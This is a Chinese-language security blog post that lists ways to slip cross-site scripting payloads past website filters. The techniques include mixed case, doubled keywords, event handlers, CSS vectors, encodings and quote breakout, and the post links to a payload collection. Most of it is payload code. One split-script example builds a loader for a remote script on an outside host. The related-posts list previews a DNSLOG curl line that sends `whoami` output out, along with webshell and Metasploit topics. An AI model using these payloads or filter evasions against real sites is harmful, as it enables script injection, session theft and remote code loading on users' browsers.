通常进行XSS脚本攻击时,一般网站都是有防护措施的,比如过滤掉我们script,javascript,或者长度限制等等,这时需要我们对我们的脚本进

行简单的变形,打到我们的目的,下面是我对常见的一些变形的分类,以及部分操作演示

1.使用<>标记插入HTML/js代码,

1
2
3
<script>alert(1)</script>

<script src="url">alert(1)</script>

1557315419658

2、html标签属性值执行XSS

1
2
3
</img  src="javascript:alert(/xss/)">
<a href="javascript:alert(/xss/)"></a>
<a href="url"></a>

3、使用空格、回车、tab

1
<img  src="java script:alert(/xss/)">

4、大小写

1
<ScrIpT>alert(1)</sCRiPt>

5、双写(重复写产生就页面只会过滤一次,我们多写一次就行了,如下

1
<ScrScrpitIpT>alert(1)</SscriptCRiPt>

6、利用自己事件去构造payload,常见有 onclick、 onmouseover 、onerror 、 onload、等等

1
2
<input type="button" value="click" onclick="alert('xss')" />
<img src=# onerror=alert(1)>

1557316091406

1
<img src="#" onerror=alert('xss')>

1557316287674

1
<BODY+ONLOAD=alert(514)>

1557317697087

7、拆分

1
2
3
4
5
6
7
8
9
10
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

8、CSS中构造XSS payload**

1
2
3
4
5
 <div style="background-image:url(javascript:alert('xss'))">
 <div style="list-style-image:url(javascript:alert('xss'))">
<link rel="stylesheet" href="http://www.xxx.com/attach.css">
http://www.xxx.com/attach.css中插入恶意代码
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d

9.字符编码(这里给推荐二个加密网站:http://ctf.ssleye.com/,或者http://xssor.io/),URL、ASCII、HTML、Characters编码、十六进制、十进制、Unicode、混合编码、CSS编码

1
<a href="document.writeln("javascript:alert(\/xss\/)");"></a>

10、根据上下文构造payload(这种应该是最实用的,但是需要我们有熟练的js语言基础),如

1557317024326

我们看到这里是有XSS注入点,但是他是在里面,就急需要我们,先吧前面的双引号闭合了,然后再把前面的<闭合了,如此来构成payload

1
"><input type="button" value="click" onclick="alert('xss')" />

1557317214298

以上就是我们XSS的payload的大致分类,只是部分示例, 我们可以去github上面去下载一些XSS的payload,根据自己网页做适当的调整,链接地址:https://github.com/Pgaijin66/XSS-Payloads

相关文章
评论
分享
  • XSS漏洞利用和beef使用

    安装好的kail XSS漏洞环境(这里我用的是bWAPP,百度安装即可) 首先打开我们的kail,打开我们的beef工具: q切换到/usr/share/beef-xss或者输入如下代码启动: 1./beef 然后登陆...

    XSS漏洞利用和beef使用
  • 存储型xss-H5页面截取

    环境准备 一个有XSS漏洞的页面,或者搭建一个漏洞平台 注册一个线上的XSS漏洞测试平台(有能力可以自己搭) 1.首先我们需要搭建一个本地的漏洞测试平台,这里我用的事pikachu漏洞平台(https://github.com/...

    存储型xss-H5页面截取
  • SSRF原理、操作演示及防御

    SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服...

    SSRF原理、操作演示及防御
  • CSRF原理及演示

    CSRF(Crosss Site Request Forgery,跨站请求伪造)是一种网络攻击方式,也被产称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF. CSRF漏洞是因...

    CSRF原理及演示
  • 一句话木马及变形

    一句话木马变形 介绍:网站后门,也可以叫做WebShell,黑客在入侵了一个网站后,通常会将一些asp或php文件与网 站服务器WEB目录下正常的网页文件混在一起,使得可以通过使用浏览器来访问这些asp或者php 文件,从而得到一个命...

    一句话木马及变形
  • 文件包含漏洞和PHP伪协议

    文件包含的漏洞形成文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshel...

    文件包含漏洞和PHP伪协议
  • DNSLOG在盲注中的使用

    DNSLOG在盲注中的使用0x00 Command Execution i. *nix:12curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj...

    DNSLOG在盲注中的使用
  • sql注入(二)

    报错注入、​ 报错函数(举例) ​ (1)extractvalue(参数1,参数2) ​ 从目标XML中返回查询的字符串,参数1 是string格式...

    sql注入(二)
  • sql注入(一)

    sql注入漏洞,主要介绍有以下几种 5.0mysql数据库特性 手工注入一般步骤 常用的万能密码 联和注入 基于布尔的盲注 基于时间的盲注 5.0mysql数据库特性information _schema 自带,系统库...

    sql注入(一)
  • msf浏览器自动攻击

    msf浏览器自动攻击 首先查看数据库状态 ,并启动数据库12/etc/init.d/postgresql status/etc/init.d/postgresql start 打开msf:1msfconsole 搜索我们需要的浏览器...

    msf浏览器自动攻击
Please check the comment setting in config.yml of hexo-theme-Annie!